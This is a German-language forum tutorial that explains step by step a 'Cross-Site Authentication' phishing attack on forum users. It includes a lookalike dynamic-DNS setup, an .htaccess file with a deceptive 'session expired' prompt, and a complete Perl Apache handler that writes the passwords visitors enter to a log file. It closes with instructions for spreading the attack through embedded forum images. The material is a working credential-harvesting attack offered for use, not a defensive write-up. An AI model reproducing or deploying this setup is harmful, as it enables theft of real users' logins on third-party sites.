XSA - Cross-Site Authentication

[Hidden99]

Vor dem Backup hab ich hier schon aml dieses Tut gepostet ist von mir
und ich wollts euch nicht vorenthalten.

1. Was ist XSA

XSA steht für Cross Site Authentictication dies beschreibt ein Angriffs Verfahren
bei dem Cross Site Scripting und Phishing vereint werden, sodass das Opfer sich noch
auf der Original Seite befindet und die Daten durch ein htaccess Fenster gephisht werden.
Dies geschieht z.B. durch das einbinden eines Bildes, welches durch htaccess geschützt ist.

2. Was wird benötigt?

Xampp aktuellste Verion hier http://www.apachefriends.org/de/xampp-windows.html
-ACHTUNG Xampp ist recht unsicher -> nur zum testen
No-Ip oder sonstige Dynamische DNS (Konfiguration wird nicht beschrieben)
(Die Adresse sollt möglichst so gewählt werden, dass sie der Adresse des Forums
welches man angreifen möchte ähnlich sieht, da viele Browser den Seitennamen bei der htaccess Aufforderung ausgeben)

3. Vorbereitung

3.1
Xampp Installieren und No-IP so einrichten, dass man bei Eingabe
der No-Ip Adresse beim Xampp Bildschirm landet. (Bei manchen Routern
klappt das nicht, wenn man selbst auf die No-IP Adresse verbidnen möchte kommt
IMMER ein Fehler ( wie bei mir -.-). In dem Fall einfach einen Kumpel fragen ob er
das kurz testen kann.)

3.2
Wenn das klappt legt ihr einen neuen Ordner im Ordner htdocs an z.B: so:
C:\xampp\htdocs\test
in diesem Ordner erstellt ihr eine Datei namens ".htaccess" Mit folgendem Inhalt:

AuthType Basic
AuthName "hier ändern"
PerlAuthenHandler Apache2::UserPwLog
require valid-user

Dort wo Hier ändern steht könnt ihr einen Fenstertitel eintragen...
z.B. sowas hier "Forum.xy - Ihre Session-ID ist abgelaufen bitte geben sie ihre Daten erneut an."
Hinweis: Wenn ihr probleme damit habt die Datei zu erstellen öffnet den Text editor geht auf Speichern unter...
stellt auf "Alle Dateien" und gebt als Dateinamen ".htaccess" ein

3.3
Ihr geht nach C:\xampp\perl\site\lib\Apache2
und ihr erstellt eine Datei mit dem namen UserPwLog.pm
Und diesem Inhalt

package Apache2::UserPwLog;
use strict;
use Apache2::Const qw(:common);
sub handler
{
my($connection) = shift;
my($result, $password) = $connection->get_basic_auth_pw;
return $result if $result != OK;
my $username = $connection->user;
unless($username && $password)
{
$connection->note_basic_auth_failure;
return AUTH_REQUIRED;
}
open (LOGFILE,'>>c:\xampp\log.txt');
printf LOGFILE "Benutzername: %s / Passwort: %s\n", $username, $password;
close LOGFILE;
return OK;
}1
;

Die Datei könnt ihr natürlich nach belieben abändern
z.b. den Pfad C:\xampp\log.txt

3.4
Ihr müsst lediglich ein Bild (oder mehrere) im Ordner
C:\xampp\htdocs\test\ platzieren, welches möglichst zum Thema des Threads passt in welchem
ihreuren Link verteilen wollt

4.Testen & Spreaden
Jetzt sollte wenn ihr auf eure No-Ip adresse verbindet und hinter die Adresse \test\euerbild.jpg setzt
ein htaccess Fenster erscheinen welches euch nach euren Daten fragt.
Wenn ihr sie eingegeben habt wird eine Datei im angegebenen Pfad erstellt welche diese Daten enthält

Ok zum spreaden geht ihr einfach auf eure Ziel Hompage welche das Einbinden von externen Bildern
erlaubt; durch Tags z.B. [img] [/img]
in diese Tags schreibt ihr einfach den Link zu eurem Pic und jeder der den Thread öffnet
wird von eurem htaccess Fenster begrüßt welche die Daten abfängt.